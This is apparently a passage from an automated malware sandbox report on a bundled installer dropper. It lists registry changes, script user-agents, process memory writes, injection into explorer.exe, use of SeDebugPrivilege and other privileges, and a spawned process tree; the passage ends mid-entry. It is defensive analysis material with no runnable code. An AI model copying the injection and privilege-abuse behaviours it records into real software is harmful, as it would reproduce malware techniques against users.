MicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerUNdlL32.eXeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown\BlameModules MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugenewz.com\Total = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugenewz.com\ = "959" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = fc761b811773d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\acnav.online\Total = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "143" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "143" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K}\1 = "2302" rUNdlL32.eXe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGLockdown\BlameModules\00000000 = "MicrosoftEdgeCP.exe\\wincorlib.DLL\\USER32.dll\\clipc.dll\\WINHTTP.dll\\CRYPTBASE.dll\\msiso.dll\\Windows.UI.dll\\usermgrcli.dll\\msctf.dll\\mrmcorer.dll\\UiaManager.dll\\Windows.Graphics.dll\\E" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b117224b1573d701 Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "190" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\650478DC7424C37C\2 = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "47" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2c0397471573d701 Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "937" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 90dce8101673d701 MicrosoftEdge.exe -
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 621 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 622 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 623 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 629 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 630 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 631 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 455 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 461 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rUNdlL32.eXesvchost.exearnatic_2.exejfiag3g_gg.exearnatic_1.exe3081054.exe1126656.exe5925079.exepid process 3172 rUNdlL32.eXe 3172 rUNdlL32.eXe 3900 svchost.exe 3900 svchost.exe 1252 arnatic_2.exe 1252 arnatic_2.exe 4732 jfiag3g_gg.exe 4732 jfiag3g_gg.exe 2164 arnatic_1.exe 2164 arnatic_1.exe 2164 arnatic_1.exe 2164 arnatic_1.exe 2164 arnatic_1.exe 2164 arnatic_1.exe 3144 3081054.exe 3144 3081054.exe 2164 arnatic_1.exe 2164 arnatic_1.exe 3876 1126656.exe 3876 1126656.exe 4176 5925079.exe 4176 5925079.exe 3876 1126656.exe 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2756 -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
arnatic_2.exeMrGh6bEH0L0a.exeexplorer.exeexplorer.exeexplorer.exepid process 1252 arnatic_2.exe 5480 MrGh6bEH0L0a.exe 2756 2756 2756 2756 2756 2756 2756 2756 5468 explorer.exe 5468 explorer.exe 5468 explorer.exe 5468 explorer.exe 2756 2756 5468 explorer.exe 5468 explorer.exe 5468 explorer.exe 5468 explorer.exe 2756 2756 2928 explorer.exe 2928 explorer.exe 5468 explorer.exe 5468 explorer.exe 5468 explorer.exe 5468 explorer.exe 2756 2756 5468 explorer.exe 5468 explorer.exe 2756 2756 5468 explorer.exe 5468 explorer.exe 5784 explorer.exe 5784 explorer.exe 5468 explorer.exe 5468 explorer.exe 5468 explorer.exe 5468 explorer.exe 2756 2756 5468 explorer.exe 5468 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe 5784 explorer.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
5145379.exe8933555.exepid process 5244 5145379.exe 6516 8933555.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
arnatic_5.exerUNdlL32.eXesvchost.exe1126656.exe5925079.exearnatic_7.exesvchost.exedescription pid process Token: SeDebugPrivilege 1584 arnatic_5.exe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3900 svchost.exe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3172 rUNdlL32.eXe Token: SeDebugPrivilege 3876 1126656.exe Token: SeDebugPrivilege 4176 5925079.exe Token: SeDebugPrivilege 208 arnatic_7.exe Token: SeAssignPrimaryTokenPrivilege 2776 svchost.exe Token: SeIncreaseQuotaPrivilege 2776 svchost.exe Token: SeSecurityPrivilege 2776 svchost.exe Token: SeTakeOwnershipPrivilege 2776 svchost.exe Token: SeLoadDriverPrivilege 2776 svchost.exe Token: SeSystemtimePrivilege 2776 svchost.exe Token: SeBackupPrivilege 2776 svchost.exe Token: SeRestorePrivilege 2776 svchost.exe Token: SeShutdownPrivilege 2776 svchost.exe Token: SeSystemEnvironmentPrivilege 2776 svchost.exe Token: SeUndockPrivilege 2776 svchost.exe Token: SeManageVolumePrivilege 2776 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2776 svchost.exe Token: SeIncreaseQuotaPrivilege 2776 svchost.exe Token: SeSecurityPrivilege 2776 svchost.exe Token: SeTakeOwnershipPrivilege 2776 svchost.exe Token: SeLoadDriverPrivilege 2776 svchost.exe Token: SeSystemtimePrivilege 2776 svchost.exe Token: SeBackupPrivilege 2776 svchost.exe Token: SeRestorePrivilege 2776 svchost.exe Token: SeShutdownPrivilege 2776 svchost.exe Token: SeSystemEnvironmentPrivilege 2776 svchost.exe Token: SeUndockPrivilege 2776 svchost.exe Token: SeManageVolumePrivilege 2776 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2776 svchost.exe Token: SeIncreaseQuotaPrivilege 2776 svchost.exe Token: SeSecurityPrivilege 2776 svchost.exe Token: SeTakeOwnershipPrivilege 2776 svchost.exe Token: SeLoadDriverPrivilege 2776 svchost.exe Token: SeSystemtimePrivilege 2776 svchost.exe Token: SeBackupPrivilege 2776 svchost.exe Token: SeRestorePrivilege 2776 svchost.exe Token: SeShutdownPrivilege 2776 svchost.exe Token: SeSystemEnvironmentPrivilege 2776 svchost.exe Token: SeUndockPrivilege 2776 svchost.exe Token: SeManageVolumePrivilege 2776 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2776 svchost.exe Token: SeIncreaseQuotaPrivilege 2776 svchost.exe Token: SeSecurityPrivilege 2776 svchost.exe Token: SeTakeOwnershipPrivilege 2776 svchost.exe Token: SeLoadDriverPrivilege 2776 svchost.exe Token: SeSystemtimePrivilege 2776 svchost.exe Token: SeBackupPrivilege 2776 svchost.exe Token: SeRestorePrivilege 2776 svchost.exe Token: SeShutdownPrivilege 2776 svchost.exe Token: SeSystemEnvironmentPrivilege 2776 svchost.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
Processes:
chrome.exeirecord.tmpSetup3310.tmpprolab.tmpultramediaburner.tmpSetup3310.tmpSetup3310.tmpSetup3310.tmplibravpn_setup.tmpLibraVPN.exepid process 2756 2756 8 chrome.exe 8 chrome.exe 2756 2756 2756 2756 2756 2756 2756 2756 5492 irecord.tmp 6780 Setup3310.tmp 2756 2756 7556 prolab.tmp 7504 ultramediaburner.tmp 744 Setup3310.tmp 7748 Setup3310.tmp 8196 Setup3310.tmp 5168 libravpn_setup.tmp 6796 LibraVPN.exe 2756 2756 2756 2756 2756 2756 2756 2756 2756 2756 -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
LibraVPN.exepid process 2756 2756 2756 6796 LibraVPN.exe -
Suspicious use of SetWindowsHookEx 28 IoCs
Processes:
Browzar.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeLibraVPN.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 3876 Browzar.exe 3876 Browzar.exe 3876 Browzar.exe 3876 Browzar.exe 3876 Browzar.exe 3876 Browzar.exe 3876 Browzar.exe 2756 5444 6520 MicrosoftEdgeCP.exe 6520 MicrosoftEdgeCP.exe 8644 MicrosoftEdge.exe 6584 MicrosoftEdgeCP.exe 6584 MicrosoftEdgeCP.exe 6796 LibraVPN.exe 6796 LibraVPN.exe 8568 MicrosoftEdge.exe 6580 MicrosoftEdgeCP.exe 6580 MicrosoftEdgeCP.exe 5184 MicrosoftEdge.exe 9120 MicrosoftEdgeCP.exe 9120 MicrosoftEdgeCP.exe 9032 MicrosoftEdge.exe 2844 MicrosoftEdgeCP.exe 2844 MicrosoftEdgeCP.exe 3684 MicrosoftEdge.exe 5924 MicrosoftEdgeCP.exe 5924 MicrosoftEdgeCP.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2756 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install - копия (20).exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exearnatic_7.exearnatic_4.exearnatic_3.exerUNdlL32.eXesvchost.exedescription pid process target process PID 3540 wrote to memory of 1580 3540 setup_x86_x64_install - копия (20).exe setup_installer.exe PID 3540 wrote to memory of 1580 3540 setup_x86_x64_install - копия (20).exe setup_installer.exe PID 3540 wrote to memory of 1580 3540 setup_x86_x64_install - копия (20).exe setup_installer.exe PID 1580 wrote to memory of 3672 1580 setup_installer.exe setup_install.exe PID 1580 wrote to memory of 3672 1580 setup_installer.exe setup_install.exe PID 1580 wrote to memory of 3672 1580 setup_installer.exe setup_install.exe PID 3672 wrote to memory of 1548 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 1548 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 1548 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 4068 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 4068 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 4068 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3104 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3104 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3104 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3004 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3004 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3004 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3092 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3092 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3092 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 2720 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 2720 3672 setup_install.exe 